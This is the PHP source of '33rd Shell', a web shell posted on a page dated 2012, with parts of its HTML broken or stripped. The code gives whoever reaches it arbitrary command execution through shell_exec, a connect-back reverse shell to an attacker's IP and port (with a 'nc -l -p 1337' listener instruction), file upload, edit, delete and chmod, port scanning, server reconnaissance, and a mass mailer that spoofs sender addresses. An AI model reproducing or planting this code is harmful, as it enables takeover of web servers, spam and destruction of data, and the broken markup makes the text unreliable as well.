sd
Fecha de Publicación: 02-01-2012
?image=1 />
PASSWORD PROTECTED AREA ENTER PASSWORD TO ACCESS CONTENT."; // The "Need to be logged in" message $errormsg = "ACCESS DENIED "; // The error message $loc_action = $PHP_SELF; // The action document for the form $loc_succ = $PHP_SELF; // Location to go to after successful login $loc_error = $PHP_SELF; // The doc to go to on bad login. You can leave $PHP_SELF in most cases $but_log = "ACCESS"; // Text on the submit button $pass = $_POST['pass']; $logged = $_COOKIE['logged']; $mod = $_POST['mod']; // If there is no cookie and the user is not logging in, output the login form if($logged != "1"&& $mod != "login") { echo ' '.$notlogged.'
'; // If there is a bad login, the error message will be displayed if($_GET['msg'] == "err") { echo '
'.$errormsg.'
'; } die; } // if the user is logging in elseif($logged != "1"&& $mod == "login") { // check the password if($pass == $thepass) { // if the pass is correct, set the cookie and go to the success page setcookie("logged", "1"); header("Location: ".$loc_succ); } else { // On bad login, go back to where you came from and try it again header("Location:".$loc_err."?msg=err"); } } ?>
"" ){ // path & file name $path_parts = pathinfo("$fdownload"); $entrypath=$path_parts["basename"]; $name = "$fdownload"; $fp = fopen($name, 'rb'); header("Content-Disposition: attachment; filename=$entrypath"); header("Content-Length: " . filesize($name)); fpassthru($fp); exit; } ?> Shell
"" ){ $fedit=realpath($fedit); $lines = file($fedit); echo "
"; $savefile=$_POST['savefile']; $filepath=realpath($_POST['filepath']); if ($savefile <> "") { $fp=fopen("$filepath","w+"); fwrite ($fp,"") ; fwrite ($fp,$savefile) ; fclose($fp); echo "
cript type="text/javascript">
"; } exit(); } ?>
"" ){ $fchmod=realpath($fchmod); echo " chmod for :$fchmod
Chmod :
"; $chmod0=$_POST['chmod0']; if ($chmod0 <> ""){ chmod ($fchmod , $chmod0); }else { echo "primission Not Allow change Chmod"; } exit(); } ?>
33rd Shell [Pre-Release 09] File Manager
Fake mail
Connect Back
Port-Scanner
Port-Checker (slow)
Server Info
About
========================================================================== ========================================================================== Welcome To Gr33ns' 33rd-php-shell This Php script is intended for website management. It Will Allow You To Do The Following: Manage Files, Delete, Read, Write, Upload, Download, Change permissions*. Send Out Emails. Allow To Run Commands Using NETCAT. Remote Port Scanner. Check For Local Open Ports. List Enviroment Variables. TODO: SMS-Delivery DEBUG!, any and all help is appreciated ;) Known Bugs: Cmd Is IFFY Some PHP versions scramble files upon save Local Port Checker Is SLOOOW PHP info page formating is kinda off Fake Mail Crashes Some Servers ========================================================================== ========================================================================== Disclamer: This tool is intended for proffesional private use only! Gr33n.org Can Not Be Held Liable For Misuse Of This Script. ©2009 green.org and project 33rd is licensed under a
33rd Shell Pre-Release 09 - Assembled 12/29/08
"; //////////////////SMS DELIVERY ////////////////////////// } /// future home of the sms center /// if ( $id=="sms"){ error_reporting(0); echo "
SMS Center
" ; echo "Send SMS to Mobiles "; echo " Not Implemented yet. "; } ///////////////////////cmd-command line//////////////////////////////////////// $cmd=$_POST['cmd']; if($id=="cmd"){ $result=shell_exec("$cmd"); echo "
CMD Execute
" ; echo " $result "; } ///////////php info///////////// $cmd=$_POST['phpnfo']; if($id=="phpnfo"){ echo " ";echo " ";echo " ";echo " ";echo " ";echo " "; phpinfo(); } ////////////////////////////server info///////////////////////////// $cmd=$_POST['info']; if($id=="info"){ ////////////Check for safe mode if( ini_get('safe_mode') ) { print 'Security: Safe Mode ON '; } else { print 'Security: Safe Mode OFF '; } /////////////// Misc enviroment info echo " OS: ". php_uname(); echo "Software: ". ($_SERVER['SERVER_SOFTWARE']); echo "Php Version: ".phpversion(); echo "User: ". get_current_user(); echo "Domain: ". ($_SERVER['SERVER_NAME']); echo "Server IP: ". ($_SERVER['REMOTE_ADDR']); echo "Location: ". ($_SERVER['DOCUMENT_ROOT']).($_SERVER['PHP_SELF']); $date_time = date('l M d, Y @ g:i A'); echo "Date: ".($date_time); echo " PHP info "; /////////////// Get Dir Var $dir = $_GET["d"]; if(!isset($dir)) { $dir = "./"; } /////////////////^^^^////whois info echo " ======================Whois====================== "; function whois($domain,$server) { $port = 43; $whois = "[$server]\n\n"; $socket = fsockopen($server, $port, $errno, $errstr, 30); if(!$socket) { return "$errstr ($errno).\n"; } else { /*query the server about the given domain name*/ fputs($socket, "$domain\r\n"); while(!feof($socket)) { /*get the server response*/ $whois = $whois . fgets($socket,128); } fclose ($socket); } return $whois; } echo nl2br(whois($_SERVER['SERVER_NAME'],'ws.arin.net')); } ///////////////////////////port scanner///////////////////////////// $cmd=$_POST['port']; if($id=="port"){ echo "
Port Scanner
" ; echo "
--->Host : Start Port: End Port :
"; if (isset($_POST['start'])) { $host = $_POST['host']; $port = $_POST['sport']; $eport = $_POST['eport']; while ($port <= $eport) { $check = fsockopen($host, $port, $errno, $errstr, 1.0); if ($check) { echo $host . " Active Port: " . $port; // outputs to the webpage open port $port++; } else { print " "; echo $host . " Closed Port: " . $port; // outputs to the webpage closed port $port++; } } } else { } } //////////////////////////////////////////port checker////////////////////// $cmd=$_POST['check']; if($id=="check"){ $ip = getenv ("REMOTE_ADDR"); $client_ip = getenv ("HTTP_CLIENT_IP"); $forward = getenv ("HTTP_X_FORWARDED_FOR"); $via = getenv ("HTTP_VIA"); if (($ip == $client_ip) || ($client_ip == NULL)) { $host = $ip; } else if (($via) || ($forward)) { $host = $client_ip; } if( $_GET['port'] == "") { $ports="20 21 22 23 25 37 53 67 79 80 110 137 138 139 143 443 993 995 2082 1080 8080 8181"; } else { $ports=$_GET['port']; } $arr[1] = "tcpmux (TCP Port Service Multiplexer)"; $arr[2] = "Management Utility"; $arr[3] = "Compression Process"; $arr[5] = "rje (Remote Job Entry)"; $arr[7] = "echo"; $arr[9] = "discard"; $arr[11] = "systat"; $arr[13] = "daytime"; $arr[15] = "netstat"; $arr[17] = "quote of the day"; $arr[18] = "send/rwp"; $arr[19] = "character generator"; $arr[20] = "ftp-data"; $arr[21] = "ftp"; $arr[22] = "ssh, pcAnywhere"; $arr[23] = "Telnet"; $arr[25] = "SMTP (Simple Mail Transfer)"; $arr[27] = "ETRN (NSW User System FE)"; $arr[29] = "MSG ICP"; $arr[31] = "MSG Authentication"; $arr[33] = "dsp (Display Support Protocol)"; $arr[37] = "time"; $arr[38] = "RAP (Route Access Protocol)"; $arr[39] = "rlp (Resource Location Protocol)"; $arr[41] = "Graphics"; $arr[42] = "nameserv, WINS"; $arr[43] = "whois, nickname"; $arr[44] = "MPM FLAGS Protocol"; $arr[45] = "Message Processing Module [recv]"; $arr[46] = "MPM [default send]"; $arr[47] = "NI FTP"; $arr[48] = "Digital Audit Daemon"; $arr[49] = "TACACS, Login Host Protocol"; $arr[50] = "RMCP, re-mail-ck"; $arr[53] = "DNS"; $arr[57] = "MTP (any private terminal access)"; $arr[59] = "NFILE"; $arr[60] = "Unassigned"; $arr[61] = "NI MAIL"; $arr[62] = "ACA Services"; $arr[63] = "whois++"; $arr[64] = "Communications Integrator (CI)"; $arr[65] = "TACACS-Database Service"; $arr[66] = "Oracle SQL*NET"; $arr[67] = "bootps (Bootstrap Protocol Server)"; $arr[68] = "bootpd/dhcp (Bootstrap Protocol Client)"; $arr[69] = "Trivial File Transfer Protocol (tftp)"; $arr[70] = "Gopher"; $arr[71] = "Remote Job Service"; $arr[72] = "Remote Job Service"; $arr[73] = "Remote Job Service"; $arr[74] = "Remote Job Service"; $arr[75] = "any private dial out service"; $arr[76] = "Distributed External Object Store"; $arr[77] = "any private RJE service"; $arr[78] = "vettcp"; $arr[79] = "finger"; $arr[80] = "World Wide Web HTTP"; $arr[81] = "HOSTS2 Name Serve"; $arr[82] = "XFER Utility"; $arr[83] = "MIT ML Device"; $arr[84] = "Common Trace Facility"; $arr[85] = "MIT ML Device"; $arr[86] = "Micro Focus Cobol"; $arr[87] = "any private terminal link"; $arr[88] = "Kerberos, WWW"; $arr[89] = "SU/MIT Telnet Gateway"; $arr[90] = "DNSIX Securit Attribute Token Map"; $arr[91] = "MIT Dover Spooler"; $arr[92] = "Network Printing Protocol"; $arr[93] = "Device Control Protocol"; $arr[94] = "Tivoli Object Dispatcher"; $arr[95] = "supdup"; $arr[96] = "DIXIE"; $arr[98] = "linuxconf"; $arr[99] = "Metagram Relay"; $arr[100] = "[unauthorized use]"; $arr[101] = "HOSTNAME"; $arr[102] = "ISO, X.400, ITOT"; $arr[103] = "Genesis Point-to㝀ƭoi T��ns��et"; $arr[104] = "ACR-NEMA Digital Imag. & Comm. 300"; $arr[105] = "CCSO name server protocol"; $arr[106] = "poppassd"; $arr[107] = "Remote Telnet Service"; $arr[108] = "SNA Gateway Access Server"; $arr[109] = "POP2"; $arr[110] = "POP3"; $arr[111] = "Sun RPC Portmapper"; $arr[112] = "McIDAS Data Transmission Protocol"; $arr[113] = "Authentication Service"; $arr[115] = "sftp (Simple File Transfer Protocol)"; $arr[116] = "ANSA REX Notify"; $arr[117] = "UUCP Path Service"; $arr[118] = "SQL Services"; $arr[119] = "NNTP"; $arr[120] = "CFDP"; $arr[123] = "NTP"; $arr[124] = "SecureID"; $arr[129] = "PWDGEN"; $arr[133] = "statsrv"; $arr[135] = "loc-srv/epmap"; $arr[137] = "netbios-ns"; $arr[138] = "netbios-dgm (UDP)"; $arr[139] = "NetBIOS"; $arr[143] = "IMAP"; $arr[144] = "NewS"; $arr[150] = "SQL-NET"; $arr[152] = "BFTP"; $arr[153] = "SGMP"; $arr[156] = "SQL Service"; $arr[161] = "SNMP"; $arr[175] = "vmnet"; $arr[177] = "XDMCP"; $arr[178] = "NextStep Window Server"; $arr[179] = "BGP"; $arr[180] = "SLmail admin"; $arr[199] = "smux"; $arr[210] = "Z39.50"; $arr[213] = "IPX"; $arr[218] = "MPP"; $arr[220] = "IMAP3"; $arr[256] = "RAP"; $arr[257] = "Secure Electronic Transaction"; $arr[258] = "Yak Winsock Personal Chat"; $arr[259] = "ESRO"; $arr[264] = "FW1_topo"; $arr[311] = "Apple WebAdmin"; $arr[350] = "MATIP type A"; $arr[351] = "MATIP type B"; $arr[363] = "RSVP tunnel"; $arr[366] = "ODMR (On-Demand Mail Relay)"; $arr[371] = "Clearcase"; $arr[387] = "AURP (AppleTalk Update-Based Routing Protocol)"; $arr[389] = "LDAP"; $arr[407] = "Timbuktu"; $arr[427] = "Server Location"; $arr[434] = "Mobile IP"; $arr[443] = "ssl"; $arr[444] = "snpp, Simple Network Paging Protocol"; $arr[445] = "SMB"; $arr[458] = "QuickTime TV/Conferencing"; $arr[468] = "Photuris"; $arr[475] = "tcpnethaspsrv"; $arr[500] = "ISAKMP, pluto"; $arr[511] = "mynet-as"; $arr[512] = "biff, rexec"; $arr[513] = "who, rlogin"; $arr[514] = "syslog, rsh"; $arr[515] = "lp, lpr, line printer"; $arr[517] = "talk"; $arr[520] = "RIP (Routing Information Protocol)"; $arr[521] = "RIPng"; $arr[522] = "ULS"; $arr[531] = "IRC"; $arr[543] = "KLogin, AppleShare over IP"; $arr[545] = "QuickTime"; $arr[548] = "AFP"; $arr[554] = "Real Time Streaming Protocol"; $arr[555] = "phAse Zero"; $arr[563] = "NNTP over SSL"; $arr[575] = "VEMMI"; $arr[581] = "Bundle Discovery Protocol"; $arr[593] = "MS-RPC"; $arr[608] = "SIFT/UFT"; $arr[626] = "Apple ASIA"; $arr[631] = "IPP (Internet Printing Protocol)"; $arr[635] = "RLZ DBase"; $arr[636] = "sldap"; $arr[642] = "EMSD"; $arr[648] = "RRP (NSI Registry Registrar Protocol)"; $arr[655] = "tinc"; $arr[660] = "Apple MacOS Server Admin"; $arr[666] = "Doom"; $arr[674] = "ACAP"; $arr[687] = "AppleShare IP Registry"; $arr[700] = "buddyphone"; $arr[705] = "AgentX for SNMP"; $arr[901] = "swat, realsecure"; $arr[993] = "s-imap"; $arr[995] = "s-pop"; $arr[1024] = "Reserved"; $arr[1025] = "network blackjack"; $arr[1062] = "Veracity"; $arr[1080] = "SOCKS"; $arr[1085] = "WebObjects"; $arr[1227] = "DNS2Go"; $arr[1243] = "SubSeven"; $arr[1338] = "Millennium Worm"; $arr[1352] = "Lotus Notes"; $arr[1381] = "Apple Network License Manager"; $arr[1417] = "Timbuktu Service 1 Port"; $arr[1418] = "Timbuktu Service 2 Port"; $arr[1419] = "Timbuktu Service 3 Port"; $arr[1420] = "Timbuktu Service 4 Port"; $arr[1433] = "Microsoft SQL Server"; $arr[1434] = "Microsoft SQL Monitor"; $arr[1477] = "ms-sna-server"; $arr[1478] = "ms-sna-base"; $arr[1490] = "insitu-conf"; $arr[1494] = "Citrix ICA Protocol"; $arr[1498] = "Watcom-SQL"; $arr[1500] = "VLSI License Manager"; $arr[1503] = "T.120"; $arr[1521] = "Oracle SQL"; $arr[1522] = "Ricardo North America License Manager"; $arr[1524] = "ingres"; $arr[1525] = "prospero"; $arr[1526] = "prospero"; $arr[1527] = "tlisrv"; $arr[1529] = "oracle"; $arr[1547] = "laplink"; $arr[1604] = "Citrix ICA, MS Terminal Server"; $arr[1645] = "RADIUS Authentication"; $arr[1646] = "RADIUS Accounting"; $arr[1680] = "Carbon Copy"; $arr[1701] = "L2TP/LSF"; $arr[1717] = "Convoy"; $arr[1720] = "H.323/Q.931"; $arr[1723] = "PPTP control port"; $arr[1731] = "MSICCP"; $arr[1755] = "Windows Media .asf"; $arr[1758] = "TFTP multicast"; $arr[1761] = "cft-0"; $arr[1762] = "cft-1"; $arr[1763] = "cft-2"; $arr[1764] = "cft-3"; $arr[1765] = "cft-4"; $arr[1766] = "cft-5"; $arr[1767] = "cft-6"; $arr[1808] = "Oracle-VP2"; $arr[1812] = "RADIUS server"; $arr[1813] = "RADIUS accounting"; $arr[1818] = "ETFTP"; $arr[1973] = "DLSw DCAP/DRAP"; $arr[1985] = "HSRP"; $arr[1999] = "Cisco AUTH"; $arr[2001] = "glimpse"; $arr[2049] = "NFS"; $arr[2064] = "distributed.net"; $arr[2065] = "DLSw"; $arr[2066] = "DLSw"; $arr[2106] = "MZAP"; $arr[2140] = "DeepThroat"; $arr[2301] = "Compaq Insight Management Web Agents"; $arr[2327] = "Netscape Conference"; $arr[2336] = "Apple UG Control"; $arr[2427] = "MGCP gateway"; $arr[2504] = "WLBS"; $arr[2535] = "MADCAP"; $arr[2543] = "sip"; $arr[2592] = "netrek"; $arr[2727] = "MGCP call agent"; $arr[2628] = "DICT"; $arr[2998] = "ISS Real Secure Console Service Port"; $arr[3000] = "Firstclass"; $arr[3001] = "Redwood Broker"; $arr[3031] = "Apple AgentVU"; $arr[3128] = "squid"; $arr[3130] = "ICP"; $arr[3150] = "DeepThroat"; $arr[3264] = "ccmail"; $arr[3283] = "Apple NetAssitant"; $arr[3288] = "COPS"; $arr[3305] = "ODETTE"; $arr[3306] = "mySQL"; $arr[3389] = "RDP Protocol (Terminal Server)"; $arr[3521] = "netrek"; $arr[4000] = "icq, command-n-conquer"; $arr[4321] = "rwhois"; $arr[4333] = "mSQL"; $arr[4444] = "KRB524"; $arr[4827] = "HTCP"; $arr[5002] = "radio free ethernet"; $arr[5004] = "RTP"; $arr[5005] = "RTP"; $arr[5010] = "Yahoo! Messenger"; $arr[5050] = "multimedia conference control tool"; $arr[5060] = "SIP"; $arr[5150] = "Ascend Tunnel Management Protocol"; $arr[5190] = "AIM"; $arr[5500] = "securid"; $arr[5501] = "securidprop"; $arr[5423] = "Apple VirtualUser"; $arr[5555] = "Personal Agent"; $arr[5631] = "PCAnywhere data"; $arr[5632] = "PCAnywhere"; $arr[5678] = "Remote Replication Agent Connection"; $arr[5800] = "VNC"; $arr[5801] = "VNC"; $arr[5900] = "VNC"; $arr[5901] = "VNC"; $arr[6000] = "X Windows"; $arr[6112] = "BattleNet"; $arr[6502] = "Netscape Conference"; $arr[6667] = "IRC"; $arr[6670] = "VocalTec Internet Phone, DeepThroat"; $arr[6699] = "napster"; $arr[6776] = "Sub7"; $arr[6970] = "RTP"; $arr[7007] = "MSBD, Windows Media encoder"; $arr[7070] = "RealServer/QuickTime"; $arr[7777] = "cbt"; $arr[7778] = "Unreal"; $arr[7648] = "CU-SeeMe"; $arr[7649] = "CU-SeeMe"; $arr[8000] = "iRDMI/Shoutcast Server"; $arr[8010] = "WinGate 2.1"; $arr[8080] = "HTTP"; $arr[8181] = "HTTP"; $arr[8383] = "IMail WWW"; $arr[8875] = "napster"; $arr[8888] = "napster"; $arr[8889] = "Desktop Data TCP 1"; $arr[8890] = "Desktop Data TCP 2"; $arr[8891] = "Desktop Data TCP 3: NESS application"; $arr[8892] = "Desktop Data TCP 4: FARM product"; $arr[8893] = "Desktop Data TCP 5: NewsEDGE/Web application"; $arr[8894] = "Desktop Data TCP 6: COAL application"; $arr[9000] = "CSlistener"; $arr[10008] = "cheese worm"; $arr[11371] = "PGP 5 Keyserver"; $arr[13223] = "PowWow"; $arr[13224] = "PowWow"; $arr[14237] = "Palm"; $arr[14238] = "Palm"; $arr[18888] = "LiquidAudio"; $arr[21157] = "Activision"; $arr[22555] = "Vocaltec Web Conference"; $arr[23213] = "PowWow"; $arr[23214] = "PowWow"; $arr[23456] = "EvilFTP"; $arr[26000] = "Quake"; $arr[27001] = "QuakeWorld"; $arr[27010] = "Half-Life"; $arr[27015] = "Half-Life"; $arr[27960] = "QuakeIII"; $arr[30029] = "AOL Admin"; $arr[31337] = "Back Orifice"; $arr[32777] = "rpc.walld"; $arr[45000] = "Cisco NetRanger postofficed"; $arr[32773] = "rpc bserverd"; $arr[32776] = "rpc.spray"; $arr[32779] = "rpc.cmsd"; $arr[38036] = "timestep"; $arr[40193] = "Novell"; $arr[41524] = "arcserve discovery"; $arr[2082] = "cPanel"; if($arr[$port]==""){ $arr[$port] = "Unknown Port"; } print "
"; $portcont=0; foreach(explode(" ","$ports") as $port) { $portcont++; if ($portcont < 30 ) { if ( is_numeric($port) ) { $fp = @fsockopen($host,$port,$errno,$errstr,3); if(!$fp) { print "
$port |
CLOSED |"; } else { print "
$port | OPEN |"; fclose($fp); } print " $arr[$port]
"; flush(); }else{ print "Error a $port. Not valid."; } } } print "
"; } //////////////////////////////Mass mail //////////////////////////////////////////////////// if ( $id=="fake-mail"){ error_reporting(0); echo "
Mass Email Sender
" ; echo " Send To :
Ammount To Send :
Message:
NOTE: some smtp servers block mass mail please test with 1 mail first
Also it may take a few minutes to deliver the mail due to several variables.
"; //send Mail $to=$_POST['to']; $nom=$_POST['nom']; $Comments=$_POST['Comments']; if ($to <> "" ){ for ($i = 0; $i < $nom ; $i++){ $from = rand (71,1020000000)."@"."33rd-shell.org"; $subject= md5("$from"); mail($to,$subject,$Comments,"From:$from"); echo "$i is ok "; } echo "
cript type="text/javascript">
"; } } //////////////////////////////////////////////Connect Back -Firewall Bypass if ($id=="cshell"){ echo " Connect back Shell , bypass Firewalls Use NetCat And Type : nc -l -p 1337 Then Press Connect Back
Your IP & BindPort: "; $mip=$_POST['mip']; $bport=$_POST['bport']; if ($mip <> "") { $fp=fsockopen($mip , $bport , $errno, $errstr); if (!$fp){ $result = "Error: could not open socket connection"; } else { fputs ($fp ,"\n*********************************************\nWelcome To gr33n.org shell Status: Ready.\n*********************************************\n\n"); while(!feof($fp)){ fputs ($fp," bash # "); $result= fgets ($fp, 4096); $message=`$result`; fputs ($fp,"--> ".$message."\n"); } fclose ($fp); } } } /////////////////////////////////////////Spy File Manager $homedir=getcwd(); $dir=realpath($_GET['dir'])."/"; if ($id=="fm"){ echo "
Home: $homedir Path: "; echo "
"; } ////////////////////////////////////////////Upload Files $rpath=$_GET['dir']; if ($rpath <> "") { $uploadfile = $rpath."/" . $_FILES['userfile']['name']; print "
";
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
echo "cript type="text/javascript">";
echo "cript type="text/javascript">";
}
}
////////////////////////////////////////////file deleted
$frpath=$_GET['fdelete'];
if ($frpath <> "") {
if (is_dir($frpath)){
$matches = glob($frpath . '/*.*');
if ( is_array ( $matches ) ) {
foreach ( $matches as $filename) {
unlink ($filename);
rmdir("$frpath");
echo "cript type="text/javascript">";
echo "cript type="text/javascript">";
}
}
}
else{
echo "cript type="text/javascript">";
unlink ("$frpath");
echo "cript type="text/javascript">";
exit(0);
}
}
?>
-=: Scripted For :=- Project 33rd